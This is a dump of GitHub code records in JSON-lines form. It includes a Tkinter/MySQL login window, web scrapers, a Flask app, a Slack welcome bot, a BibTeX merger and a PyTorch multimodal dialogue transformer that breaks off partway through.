K_F_MNIST([28,28,1])\ntrainer = Trainer(train_dataset,test_dataset,classifier,batch_size)\ntrainer.start(\"pretrained_model/MNIST/\",save_name=\"classifier\",epochs=8,log_path='training_log/MNIST/')\n\n# classifier.loadWeights(\"pretrained_model/MNIST/classifier\")\n# acc = utils.accuracy_on_dataset(classifier,test_dataset)\n# print(acc)\n","repo_name":"Flashikez/Diplomova_Praca","sub_path":"Diplomovka/Classifiers/K_F_MNIST/train_MNIST.py","file_name":"train_MNIST.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"10299544380","text":"from tkinter import * \nfrom tkinter import font\nimport cv2, os\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import messagebox\nfrom PIL import Image, ImageTk\nimport mysql.connector\nfrom register import Register\nfrom Class import *\n\n\nclass Login_Windows:\n def __init__(self,root):\n self.root = root\n self.root.geometry(\"800x500+0+0\")\n self.root.title(\"Login System\")\n self.root.option_add(\"*tearOff\", False)\n\n img3 = Image.open(r\"assets/img/loginwd.jpg\")\n img3 = img3.resize((800,500),Image.ANTIALIAS)\n self.photoimg3 = ImageTk.PhotoImage(img3)\n\n bg_img = ttk.Label(self.root, image = self.photoimg3)\n bg_img.place(x = 0,y = 0, width = 800, height = 500)\n\n main_frame = Frame(bg_img, bg = \"#03153B\")\n main_frame.place(x = 440, y = 0, width = 445, height = 500)\n \n img4 = Image.open(r\"assets/img/User.png\")\n img4 = img4.resize((80,80),Image.ANTIALIAS)\n self.photoimg4 = ImageTk.PhotoImage(img4)\n\n lbl_img4 = Label(self.root, image = self.photoimg4, bg = \"#03153B\")\n lbl_img4.place(x = 580,y = 20, width = 75, height = 75)\n \n login = Label(main_frame, text = \"Đăng nhập\", font = (\"Google Sans\",20,\"bold\"),fg = \"white\", bg = \"#03153B\")\n login.place(x 
= 100, y = 70, width = 150, height = 100)\n\n#Label\n\n        username = lbl = Label(main_frame, text = \"Tên đăng nhập \", font = (\"Google Sans\",9,\"bold\"),fg = \"#4F6998\", bg = \"#03153B\" )\n        username.place(x = 55, y = 180, width = 120, height = 20)\n\n        self.txtUser = ttk.Entry(main_frame, font = (\"Google Sans\",11,\"bold\"), width = 17)\n        self.txtUser.place(x = 70, y = 200, width = 250, height = 35)\n\n        password = lbl = Label(main_frame, text = \"Mật khẩu \", font = (\"Google Sans\",9,\"bold\"),fg = \"#4F6998\", bg = \"#03153B\" )\n        password.place(x = 40, y = 250, width = 120, height = 20)\n\n        self.txtPwd = ttk.Entry(main_frame, font = (\"Google Sans\",11,\"bold\"), width = 17)\n        self.txtPwd.place(x = 70, y = 270, width = 250, height = 35)\n\n\n#Icon images\n\n        img5 = Image.open(r\"assets/img/uslg.png\")\n        img5 = img5.resize((33,33),Image.ANTIALIAS)\n        self.photoimg5 = ImageTk.PhotoImage(img5)\n\n        uslg_img =Label(main_frame, image = self.photoimg5, bg = \"#03153B\")\n        uslg_img.place(x = 33,y = 200, width = 33, height = 33)\n\n        img6 = Image.open(r\"assets/img/pwd.png\")\n        img6 = img6.resize((25,30),Image.ANTIALIAS)\n        self.photoimg6 = ImageTk.PhotoImage(img6)\n\n        pwd_img =Label(main_frame, image = self.photoimg6, bg = \"#03153B\")\n        pwd_img.place(x = 33,y = 270, width = 33, height = 33)\n\n#Button\n        loginbtn = ttk.Button(main_frame, command = self.login, text = \"Đăng nhập\", style=\"ToggleButton\")\n        loginbtn.place(x = 45, y = 350, width = 125, height = 33)\n\n        regbtn = ttk.Button(main_frame, command = self.register, text = \"Đăng ký\", style=\"ToggleButton\")\n        regbtn.place(x = 200, y = 350, width = 125, height = 33)\n\n        fgpwdbtn = Button(main_frame, text = \"Quên mật khẩu\",borderwidth= 0, font = (\"Google Sans\",9,\"italic\"),fg = \"#4F6998\", bg = \"#03153B\", activeforeground=\"#52A1EC\", activebackground = \"#03153B\")\n        fgpwdbtn.place(x = 55, y = 400, width = 260, height = 33)\n\n\n    def login(self):\n        if self.txtUser.get()== \"\" or self.txtPwd.get()==\"\":\n            messagebox.showerror(\"Error\",\"Không được để trống Tên đăng nhập hoặc Mật khẩu!\") \n        else:\n            try:\n                conn = mysql.connector.connect(user='root', password='250301',\n                              host='localhost',\n                              database='face_recognition')\n                print('Connect successfully') \n                cursor = conn.cursor()\n                cursor .execute(\"select * from user_data where user = %s and pwd = %s\", (\n                    self.txtUser.get(),\n                    self.txtPwd.get()\n                ))\n                rows = cursor.fetchone()\n                if rows == None:\n                    messagebox.showerror(\"Error\",\"Tên đăng nhập hoặc mật khẩu không đúng!\") \n                else:\n                    messagebox.showinfo(\"Success\", \"Đăng nhập thành công!\")\n                    self.new_window = Toplevel(self.root)\n                    self.obj = Face_Recognition_System(self.new_window)\n                conn.commit()\n                conn.close()\n            except Exception as es:\n                messagebox.showerror(\"Error\", f\"Due To:{str(es)}\", parent = self.root)\n        \n    def register(self):\n        self.new_window = Toplevel(self.root)\n        self.obj = Register(self.new_window)\n\n\nif __name__ == \"__main__\":\n    root =Tk()\n    root.option_add(\"*tearOff\", False)\n\n    # Make the app responsive\n    root.columnconfigure(index=0, weight=1)\n    root.columnconfigure(index=1, weight=1)\n    root.columnconfigure(index=2, weight=1)\n    root.rowconfigure(index=0, weight=1)\n    root.rowconfigure(index=1, weight=1)\n    root.rowconfigure(index=2, weight=1)\n\n    # Create a style\n    style = ttk.Style(root)\n\n    # Import the tcl file\n    root.tk.call(\"source\", \"Azure-ttk-theme/azure-dark.tcl\")\n\n    # Set the theme with the theme_use method\n    style.theme_use(\"azure-dark\")\n    obj = Login_Windows(root)\n 
root.mainloop()","repo_name":"TanIT2503/DevProject","sub_path":"FaceTraining/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":5386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"74540807655","text":"import requests\nimport json\nfrom sql import mysql\n\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/91.0.4472.124 Safari/537.36 '\n }\n\n\ndef get_pageItem(url) -> list:\n html = requests.get(url, headers=headers).text\n html_dic : dict = json.loads(html)\n item = html_dic['listing']['items']\n return item\n\n\ndef main(db, table):\n conn = mysql.SQL(db, table)\n conn.enter_database()\n conn.enter_table()\n for pageNo in range(1, 76):\n url = f'https://www.bidorbuy.co.za/mobilejquery/jsp/category/CategoriesAJAXHandler.jsp?pageNo={pageNo}&category=HotSelling'\n items: list = get_pageItem(url)\n for item in items:\n name = item['name']\n if 'voucher' in name or 'Voucher' in name:\n continue\n name = name.replace('\\'', '')\n name = name.replace('\\\"', '')\n ID = str(item['id'])\n ID1 = ID + '--1'\n ID2 = ID + '--2'\n img = item['product_image_url']\n price = 'R' + item['unit_sale_price']\n conn.insertData(ID, img, name, price)\n conn.insertData(ID1, img, name, price)\n conn.insertData(ID2, img, name, price)\n print('Write success', ID)\n","repo_name":"shopshipshake/Shopshipshake","sub_path":"djangoWebCrawl/crawl/stage_1/bidorbuy.py","file_name":"bidorbuy.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"90"} +{"seq_id":"43752414050","text":"data_dtypes = {}\nmobility_dtypes = {\"location_name\": \"category\",\n \"street_address\": \"category\",\n \"city\": \"category\",\n \"region\": \"category\",\n \"poi_cbg\": \"category\",\n \"brands\": \"category\",\n \"date_range_start\": \"category\",\n \"date_range_end\": \"category\",\n \"year\": \"int16\",\n \"month\": \"int8\",\n \"day\": \"int8\"}\n\ncensus_dtypes = {\"census_block_group\": \"category\"}\n","repo_name":"angel-langdon/Project2021","sub_path":"src/PythonLib/lib/utils/download_data/data_dtypes.py","file_name":"data_dtypes.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"90"} +{"seq_id":"1250120682","text":"import re\nfrom datetime import datetime, timedelta\nimport dateparser\nimport scrapy\n\nfrom tpdb.BaseSceneScraper import BaseSceneScraper\n\n\nclass SiteFightingDollsSpider(BaseSceneScraper):\n name = 'FightingDolls'\n network = 'Fighting Dolls'\n\n start_urls = [\n 'https://www.trib-dolls.com',\n 'https://www.fighting-dolls.com',\n ]\n\n selector_map = {\n 'title': '//h1/text()',\n 'description': '//h3[contains(text(),\"Description\")]/following-sibling::p//text()',\n 'date': '//div[@class=\"categories\"]/text()',\n 'image': '//div[@id=\"sample\"]/img/@src',\n 'performers': '//div[@class=\"grid-x\"]/div/div/div/h3/a/text()',\n 'tags': '//div[@class=\"categories\"]/a/text()',\n 'external_id': r'.*\\/(.*?)\\/',\n 'trailer': '',\n 'pagination': ''\n }\n\n def get_scenes(self, response):\n scenes = response.xpath('//div[@class=\"card-image\"]/a/@href').getall()\n for scene in scenes:\n if re.search(self.get_selector_map('external_id'), scene):\n yield scrapy.Request(url=self.format_link(response, scene), callback=self.parse_scene)\n\n def get_site(self, response):\n if \"trib-dolls\" in response.url:\n 
return \"Trib Dolls\"\n return \"Fighting Dolls\"\n\n def get_parent(self, response):\n if \"trib-dolls\" in response.url:\n return \"Trib Dolls\"\n return \"Fighting Dolls\"\n\n def get_next_page_url(self, base, page):\n if \"fighting-dolls\" in base:\n pagination = '/all-fighting-dolls-videos/%s/'\n if \"trib-dolls\" in base:\n pagination = '/all-trib-dolls-videos/%s/'\n page = str(int(page) - 1)\n return self.format_url(base, pagination % page)\n\n def get_date(self, response):\n date = response.xpath('//div[@class=\"categories\"]/text()').getall()\n if date:\n date = \"\".join(date)\n date = re.search(r'(\\d+) day', date)\n if date:\n daysago = int(date.group(1))\n date = datetime.now() - timedelta(days=daysago)\n if date:\n return date.isoformat()\n return dateparser.parse('today').isoformat()\n","repo_name":"SFTEAM/scrapers","sub_path":"scenes/siteFightingDolls.py","file_name":"siteFightingDolls.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"90"} +{"seq_id":"10649147539","text":"import pandas as pd\n\nfrom flask import Flask, cli\nfrom flask_restful import Api\nfrom flask_sqlalchemy import SQLAlchemy\nimport click\nfrom datetime import datetime\n\nfrom app.controllers.indexcontroller import IndexController\nfrom app.controllers.filecontroller import FileController\nfrom app.controllers.readingscontroller import ReadingsController\nfrom app.controllers.datacontroller import DataController\nfrom app.controllers.datatablecontroller import DataTableController\nfrom app.controllers.infocontroller import InfoController\nfrom app.database import db\nfrom app.models.site import Site\nfrom app.models.readings import Readings\n\n\ndef create_app():\n app = Flask(__name__)\n \n api = Api(app)\n api.add_resource(IndexController, '/')\n api.add_resource(FileController, '/')\n api.add_resource(ReadingsController, '/readings/')\n api.add_resource(DataController, '/data')\n api.add_resource(DataTableController, '/datatable')\n api.add_resource(InfoController, '/info')\n\n app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///../app/mapping.db'\n app.config['SQLALCHEMY_ECHO'] = True\n db.init_app(app)\n\n app.cli.add_command(create_db)\n app.cli.add_command(create_sites)\n app.cli.add_command(create_readings)\n\n return app\n\n@click.command('create_db')\n@cli.with_appcontext\ndef create_db():\n db.create_all()\n\n@click.command('create_sites')\n@click.argument('sitepath')\n@cli.with_appcontext\ndef create_sites(sitepath):\n sites = pd.read_csv(sitepath)\n for i,row in sites.iterrows():\n site = Site(\n site_id = int(sites.loc[i]['site_id']), \n name = sites.loc[i]['name'], \n waterbody = sites.loc[i]['waterbody'])\n db.session.add(site)\n db.session.commit()\n\n@click.command('create_readings')\n@click.argument('readingspath')\n@cli.with_appcontext\ndef create_readings(readingspath):\n readings = pd.read_csv(readingspath)\n readings['date'] = pd.to_datetime(readings.date)\n readings.sort_values('date',inplace=True)\n for i,row in readings.iterrows():\n reading = Readings(\n reading_id = int(readings.loc[i]['reading_id']),\n site_id = int(readings.loc[i]['site_id']),\n date = readings.loc[i]['date'],\n time = readings.loc[i]['time'],\n tempcelsius = readings.loc[i]['tempcelsius'],\n ph = readings.loc[i]['ph'],\n do = readings.loc[i]['do'],\n phosphate = readings.loc[i]['phosphate'],\n conductivity = readings.loc[i]['conductivity'])\n db.session.add(reading)\n db.session.commit()\n\n\n\n# 
'/Users/sarahbuchhorn/Desktop/chipy/mapping/app/dist/data/sites.csv'\n# '/Users/sarahbuchhorn/Desktop/chipy/mapping/app/dist/data/readings.csv\n\n","repo_name":"scb02010/chicago-river-checkup","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18430357289","text":"\n\ndef read_int():\n return int(input().strip())\n\n\ndef read_ints():\n return list(map(int, input().strip().split(' ')))\n\n\ndef solve():\n N = read_int()\n table = [\n [1 for _ in range(N)] for _ in range(N)\n ]\n if N%2 == 0:\n for i in range(N//2):\n table[i][N-i-1] = table[N-i-1][i] = 0\n else:\n for i in range(N//2):\n table[i][N-i-2] = table[N-i-2][i] = 0\n size = 0\n answer = []\n for i in range(N):\n for j in range(i+1, N):\n if table[i][j]:\n answer.append((i+1, j+1))\n size += 1\n print(size)\n for a in answer:\n print(*a)\n\n\nif __name__ == '__main__':\n solve()\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03090/s695736917.py","file_name":"s695736917.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"43522230751","text":"#! /usr/bin/env python3\n'''\nNiema Moshiri 2017\n\nMerge multiple bib files into a single file: merged.bib\n'''\nimport sys\nfrom bibtexparser.bparser import BibTexParser\nfrom bibtexparser.bibdatabase import BibDatabase\nfrom bibtexparser.bwriter import BibTexWriter\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1 or (len(sys.argv) == 2 and sys.argv[1] in {'h','-h','--h','help','-help','--help'}):\n sys.stderr.write(\"USAGE: python printbib.py ...\\n\")\n exit(0)\n if len(sys.argv) == 2:\n sys.stderr.write(\"ERROR: Only 1 file specified\\n\")\n sys.stderr.write(\"USAGE: python printbib.py ...\\n\")\n exit(-1)\n try:\n entrylists = [(f,BibTexParser(open(f).read()).get_entry_list()) for f in sys.argv[1:]] # (file,entrylist) tuples\n except:\n sys.stderr.write(\"ERROR: Failed to read bib files\\n\")\n exit(-1)\n for bibfile,entrylist in entrylists:\n sys.stderr.write(str(len(entrylist)) + \" entries in file \" + bibfile + '\\n')\n entries = {} # store all entry IDs I've seen so far (entries[ID] = file I read it from)\n outlist = []\n f = open('merged.bib','w')\n for bibfile,entrylist in entrylists:\n for entry in entrylist:\n if entry['ID'] in entries:\n sys.stderr.write(\"DUPLICATE: \" + entry['ID'] + \", using entry from \" + entries[entry['ID']] + '\\n')\n else:\n outlist.append(entry)\n entries[entry['ID']] = bibfile\n db = BibDatabase()\n db.entries = outlist\n writer = BibTexWriter()\n print(writer.write(db).encode('utf8'))\n sys.stderr.write(str(len(entries)) + \" entries in output\\n\")\n","repo_name":"niemasd/tools","sub_path":"mergebib.py","file_name":"mergebib.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"90"} +{"seq_id":"25300598376","text":"#\r\n# @lc app=leetcode.cn id=240 lang=python3\r\n#\r\n# [240] 搜索二维矩阵 II\r\n#\r\n\r\n# @lc code=start\r\nclass Solution:\r\n # 本题根据给定矩阵的性质,将行和列的下标初始化为左下角的元素下标\r\n # 然后根据元素值与target的大小向上或向右移动,直到找到target或者\r\n # 下标超出范围。\r\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\r\n if matrix == None or len(matrix) == 0 or len(matrix[0]) == 0:\r\n return False\r\n # 行\r\n row = len(matrix)-1\r\n # 列\r\n col = 0\r\n while row >= 0 and col < len(matrix[0]):\r\n if 
matrix[row][col] > target:\r\n row -= 1\r\n elif matrix[row][col] < target:\r\n col += 1\r\n else:\r\n return True\r\n return False\r\n# @lc code=end\r\n\r\n","repo_name":"HughTang/Leetcode-Python","sub_path":"Array and Matrix/240.搜索二维矩阵-ii.py","file_name":"240.搜索二维矩阵-ii.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"34855058733","text":"import sys\nimport time\nimport logging\nimport logging.config\nfrom pprint import pformat\n\nimport click\nimport websocket # Depedency of slackclient, needed for exception handling\nfrom slackclient import SlackClient\n\n__author__ = 'Reilly Tucker Siemens'\n__email__ = 'reilly@tuckersiemens.com'\n__version__ = '0.1.0'\n\n\ndef bail(msg_type: str, color: str, text: str) -> str:\n return f\"{click.style(msg_type, fg=color)}: {text}\"\n\n\ndef setup_logging(verbose: int) -> None:\n logging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'standard': {\n 'format': \"%(asctime)s [%(levelname)s] %(message)s\",\n 'datefmt': \"[%Y-%m-%d %H:%M:%S %z]\",\n },\n },\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'standard',\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['console'],\n 'level': logging.INFO if verbose < 1 else logging.DEBUG,\n 'propagate': True,\n },\n 'requests.packages.urllib3': { # Oh, do shut up, requests.\n 'handlers': ['console'],\n 'level': logging.CRITICAL,\n },\n },\n })\n\n\ndef find_channel_id(channel: str, sc: SlackClient) -> str:\n channels_list = sc.api_call(\"channels.list\").get('channels')\n groups_list = sc.api_call(\"groups.list\").get('groups')\n\n if not channels_list and not groups_list:\n sys.exit(bail('fatal', 'red', \"Couldn't enumerate channels/groups\"))\n\n # Is there a better way to search a list of dictionaries? 
Probably.\n channel_ids = [c['id'] for c in channels_list + groups_list if c['name'] == channel]\n\n if not channel_ids:\n sys.exit(bail('fatal', 'red', f\"Couldn't find #{channel}\"))\n\n return channel_ids[0]\n\n\ndef handle_event(event: dict, channel: str, channel_id: str, message: str,\n sc: SlackClient, logger: logging.Logger) -> None:\n pretty_event = pformat(event)\n logger.debug(f\"Event received:\\n{pretty_event}\")\n\n subtype = event.get('subtype')\n user = event.get('user')\n\n if subtype in ('group_join', 'channel_join') and user:\n\n # We will use the event's channel ID to send a response and refer to\n # users by their display_name in accordance with new guidelines.\n # https://api.slack.com/changelog/2017-09-the-one-about-usernames\n event_channel_id = event.get('channel')\n user_profile = event.get('user_profile')\n username = user_profile.get('display_name')\n user_mention = f\"<@{user}>\"\n message = message.replace('{user}', user_mention)\n\n if event_channel_id == channel_id:\n try:\n sc.rtm_send_message(event_channel_id, message)\n logger.info(f\"Welcomed {username} to #{channel}\")\n except AttributeError:\n logger.error(f\"Couldn't send message to #{channel}\")\n\n\ndef run(sc: SlackClient, channel: str, message: str, retries: int,\n logger: logging.Logger) -> None:\n if sc.rtm_connect():\n logger.info(\"Connected to Slack\")\n\n channel_id = find_channel_id(channel, sc)\n logger.debug(f\"Found channel ID {channel_id} for #{channel}\")\n\n logger.info(f\"Listening for joins in #{channel}\")\n\n retry_count = 0\n backoff = 0.5\n\n while True:\n try:\n # Handle dem events!\n for event in sc.rtm_read():\n handle_event(event, channel, channel_id, message, sc, logger)\n\n # Reset exponential backoff retry strategy every time we\n # successfully loop. Failure would have happened in rtm_read()\n retry_count = 0\n\n time.sleep(0.5)\n\n # This is necessary to handle an error caused by a bug in Slack's\n # Python client. 
For more information see\n # https://github.com/slackhq/python-slackclient/issues/127\n #\n # The TimeoutError could be more elegantly resolved by making a PR\n # to the websocket-client library and letting them coerce that\n # exception to a WebSocketTimeoutException.\n except (websocket.WebSocketConnectionClosedException, TimeoutError):\n logger.error(\"Lost connection to Slack, reconnecting...\")\n if not sc.rtm_connect():\n logger.info(\"Failed to reconnect to Slack\")\n if retry_count >= retries:\n sys.exit(bail(\n 'fatal',\n 'red',\n \"Too many failed reconnect attempts, shutting down\")\n )\n time.sleep((backoff ** 2) / 4)\n else:\n logger.info(\"Reconnected to Slack\")\n\n retry_count += 1\n\n else:\n sys.exit(bail('fatal', 'red', \"Couldn't connect to Slack\"))\n","repo_name":"reillysiemens/wb2k","sub_path":"layabout.py","file_name":"layabout.py","file_ext":"py","file_size_in_byte":5046,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"90"} +{"seq_id":"33687259877","text":"import torch\nimport torch.nn as nn\nimport pytorch_lightning as pl\nimport pace.modules.vision_transformer as vit\n\nfrom transformers.models.bert.modeling_bert import BertConfig, BertEmbeddings\nfrom pace.modules import heads, objectives, pace_utils\nfrom pace.utils import model_state_load\nfrom pace.utils.glossary import acts\nimport math\n\nclass TransformerSS(pl.LightningModule):\n def __init__(self, config):\n super().__init__()\n self.save_hyperparameters()\n\n bert_config = BertConfig(\n vocab_size=config[\"vocab_size\"],\n hidden_size=config[\"hidden_size\"],\n num_hidden_layers=config[\"num_layers\"],\n num_attention_heads=config[\"num_heads\"],\n intermediate_size=config[\"hidden_size\"] * config[\"mlp_ratio\"],\n max_position_embeddings=config[\"max_text_len\"],\n hidden_dropout_prob=config[\"drop_rate\"],\n attention_probs_dropout_prob=config[\"drop_rate\"],\n )\n\n self.text_embeddings = BertEmbeddings(bert_config)\n self.text_embeddings.apply(objectives.init_weights)\n\n self.token_type_embeddings = nn.Embedding(2, config[\"hidden_size\"])\n self.token_type_embeddings.apply(objectives.init_weights)\n\n if self.hparams.config[\"load_path\"] == \"\":\n self.transformer = getattr(vit, self.hparams.config[\"vit\"])(\n pretrained=True, config=self.hparams.config\n )\n else:\n self.transformer = getattr(vit, self.hparams.config[\"vit\"])(\n pretrained=False, config=self.hparams.config\n )\n\n self.pooler = heads.Pooler(config[\"hidden_size\"])\n self.pooler.apply(objectives.init_weights)\n\n if config[\"loss_names\"][\"mlm\"] > 0 or config[\"loss_names\"][\"seq2seq\"] > 0:\n self.mlm_score = heads.MLMHead(bert_config)\n self.mlm_score.apply(objectives.init_weights)\n\n if config[\"loss_names\"][\"itm\"] > 0:\n self.itm_score = heads.ITMHead(config[\"hidden_size\"])\n self.itm_score.apply(objectives.init_weights)\n\n if config[\"loss_names\"][\"mpp\"] > 0:\n self.mpp_score = heads.MPPHead(bert_config)\n self.mpp_score.apply(objectives.init_weights)\n\n # ===================== Downstream ===================== #\n if (\n self.hparams.config[\"load_path\"] != \"\"\n and not self.hparams.config[\"test_only\"]\n ):\n # self.load_from_checkpoint(self.hparams.config[\"load_path\"], map_location=\"cpu\")\n ckpt = torch.load(self.hparams.config[\"load_path\"], map_location=\"cpu\")\n state_dict = ckpt[\"state_dict\"]\n if ckpt[\"state_dict\"]['text_embeddings.position_ids'].shape[1] != self.hparams.config[\"max_text_len\"]:\n state_dict = 
model_state_load.change_text_maxlen(state_dict, self.hparams.config[\"max_text_len\"])\n if config[\"loss_names\"][\"mlm\"] > 0 and state_dict[\"text_embeddings.word_embeddings.weight\"].shape[0] < self.hparams.config[\"vocab_size\"]:\n state_dict = model_state_load.resize_token_embedding(state_dict , self.hparams.config[\"vocab_size\"])\n # if self.hparams.config[\"need_expert_load\"] == True:\n # state_dict = model_state_load.expert_state_load(state_dict)\n self.load_state_dict(state_dict, strict=False)\n\n hs = self.hparams.config[\"hidden_size\"]\n\n if self.hparams.config[\"loss_names\"][\"irtr\"] > 0:\n self.rank_output = nn.Linear(hs, 1)\n self.rank_output.weight.data = self.itm_score.fc.weight.data[1:, :]\n self.rank_output.bias.data = self.itm_score.fc.bias.data[1:]\n self.margin = 0.2\n for p in self.itm_score.parameters():\n p.requires_grad = False\n\n if self.hparams.config[\"loss_names\"][\"dst\"] > 0:\n self.candidate_value_cache = {}\n self.cross_entropy = nn.CrossEntropyLoss()\n self.dropout = nn.Dropout(config[\"drop_rate\"])\n self.classifier_gate = nn.Linear(hs, 2)\n self.classifier_span = nn.Linear(hs, 3)\n self.classifier_action = nn.Linear(hs, len(acts))\n ## ====init==== ##\n self.classifier_gate.apply(objectives.init_weights)\n self.classifier_span.apply(objectives.init_weights)\n self.classifier_action.apply(objectives.init_weights)\n\n pace_utils.set_metrics(self)\n self.current_tasks = list()\n\n # ===================== load downstream (test_only) ======================\n\n if self.hparams.config[\"load_path\"] != \"\" and self.hparams.config[\"test_only\"]:\n ckpt = torch.load(self.hparams.config[\"load_path\"], map_location=\"cpu\")\n state_dict = ckpt[\"state_dict\"]\n self.load_state_dict(state_dict, strict=False)\n\n def get_extended_attention_mask(self, attention_mask=None):\n if attention_mask.dim() == 2:\n extended_attention_mask = attention_mask.unsqueeze(1).unsqueeze(2)\n elif attention_mask.dim() == 3:\n extended_attention_mask = attention_mask.unsqueeze(1)\n else:\n raise NotImplementedError\n\n return extended_attention_mask\n\n def infer(\n self,\n batch,\n mask_text=False,\n mask_image=False,\n image_token_type_idx=1,\n image_embeds=None,\n image_masks=None,\n ):\n if f\"image_{image_token_type_idx - 1}\" in batch:\n imgkey = f\"image_{image_token_type_idx - 1}\"\n else:\n imgkey = \"image\"\n\n do_mlm = \"_mlm\" if mask_text else \"\"\n text_ids = batch[f\"text_ids{do_mlm}\"]\n text_labels = batch[f\"text_labels{do_mlm}\"]\n text_masks = batch[f\"text_masks\"]\n text_segment_ids = batch[\"text_segment_ids\"] if self.hparams.config[\"use_segment_ids\"] else None\n text_embeds = self.text_embeddings(text_ids,token_type_ids=text_segment_ids)\n discard_image = self.hparams.config[\"discard_image\"]\n\n #TODO 修改mmconv dst相关代码,通过配置discard_image实现图像无关的任务\n # if discard_image:\n # return self.pure_text_infer(text_ids, text_masks, mask_text=False)\n if imgkey not in batch and image_embeds is None and image_masks is None:\n return self.pure_text_infer(text_ids, text_masks, mask_text=False)\n if image_embeds is None and image_masks is None:\n img = batch[imgkey][0] # 上下无关\n\n (image_embeds, image_masks, patch_index, image_labels,) = self.transformer.visual_embed(\n img,\n max_image_len=self.hparams.config[\"max_image_len\"],\n mask_it=mask_image,\n )\n else:\n patch_index, image_labels = (\n None,\n None,\n )\n\n text_embeds, image_embeds = (\n text_embeds + self.token_type_embeddings(torch.zeros_like(text_ids)),\n image_embeds\n + 
self.token_type_embeddings(\n torch.full_like(image_masks, image_token_type_idx)\n ),\n )\n image_patch_len = image_embeds.shape[1]\n co_embeds = torch.cat([image_embeds,text_embeds], dim=1)\n\n if \"attention_masks\" in batch:\n max_image_cls_len = self.hparams.config[\"max_image_len\"] + 1#add cls token\n co_masks = batch[\"attention_masks\"][:,max_image_cls_len-image_patch_len:,max_image_cls_len-image_patch_len:]\n else:\n co_masks = torch.cat([image_masks,text_masks], dim=1)\n\n if discard_image:\n co_embeds = co_embeds[:,image_patch_len:]\n co_masks = co_masks[:, image_patch_len: , image_patch_len:]\n\n co_masks = self.get_extended_attention_mask(attention_mask=co_masks) \n x = co_embeds\n it_split = text_embeds.shape[1]\n num_layers = len(self.transformer.blocks)\n\n #TODO 纯文本的路由\n for i, blk in enumerate(self.transformer.blocks):\n #按任务划分\n if self.hparams.config[\"loss_names\"][\"seq2seq\"] > 0:\n if i < (num_layers-3):\n x, _attn = blk(x , mask=co_masks , expert_flag=0 ,it_split=it_split)\n else:\n x, _attn = blk(x , mask=co_masks , expert_flag=4 ,it_split=it_split)\n else:\n if i < (num_layers-3):\n x, _attn = blk(x, mask=co_masks, expert_flag=3, it_split=it_split)\n else:\n x, _attn = blk(x, mask=co_masks, expert_flag=2, it_split=None)\n\n x = self.transformer.norm(x)\n image_feats, text_feats = (\n x[:, : -text_embeds.shape[1]],\n x[:, -text_embeds.shape[1] :],\n )\n cls_feats = self.pooler(text_feats)\n\n ret = {\n \"text_feats\": text_feats,\n \"image_feats\": image_feats,\n \"cls_feats\": cls_feats,\n \"raw_cls_feats\": text_feats[:, 0],\n \"image_labels\": image_labels,\n \"image_masks\": image_masks,\n \"text_labels\": text_labels,\n \"text_ids\": text_ids,\n \"text_masks\": text_masks,\n \"patch_index\": patch_index,\n }\n\n return ret\n\n def pure_text_infer(self, text_ids, text_masks= None, mask_text=False):\n text_embeds = self.text_embeddings(text_ids)\n if text_masks == None:\n text_masks = torch.ones_like(text_ids).to(self.device)\n text_masks = self.get_extended_attention_mask(text_masks)\n text_embeds = (text_embeds + self.token_type_embeddings(torch.zeros_like(text_ids)))\n it_split = text_embeds.shape[1]\n x = text_embeds\n\n for i, blk in enumerate(self.transformer.blocks):\n x, _attn = blk(x, mask=text_masks, expert_flag=0, it_split=it_split , )\n\n x = self.transformer.norm(x)\n cls_feats = self.pooler(x)\n ret = {\n \"text_feats\": x,\n \"cls_feats\": cls_feats,\n \"text_ids\": text_ids,\n \"text_masks\": text_masks,\n }\n\n return ret\n\n def forward(self, batch):\n ret = dict()\n if len(self.current_tasks) == 0:\n ret.update(self.infer(batch))\n return ret\n\n # Masked Language Modeling\n if \"mlm\" in self.current_tasks:\n ret.update(objectives.compute_mlm(self, batch))\n\n # Masked Patch Prediction\n if \"mpp\" in self.current_tasks:\n ret.update(objectives.compute_mpp(self, batch))\n\n # Image Text Matching\n if \"itm\" in self.current_tasks:\n ret.update(objectives.compute_itm_wpa(self, batch))\n\n # Image Retrieval and Text Retrieval\n if \"irtr\" in self.current_tasks:\n ret.update(objectives.compute_irtr(self, batch))\n \n # MMConv DST\n if \"dst\" in self.current_tasks:\n objectives.set_slot_tokens(self)\n ret.update(objectives.compute_dst(self, batch))\n \n if \"intent\" in self.current_tasks:\n ret.update(objectives.compute_itm_intent(self, batch))\n \n # Text generation\n if \"seq2seq\" in self.current_tasks:\n ret.update(objectives.compute_seq2seq(self, batch))\n\n return ret\n\n def training_step(self, batch, batch_idx):\n 
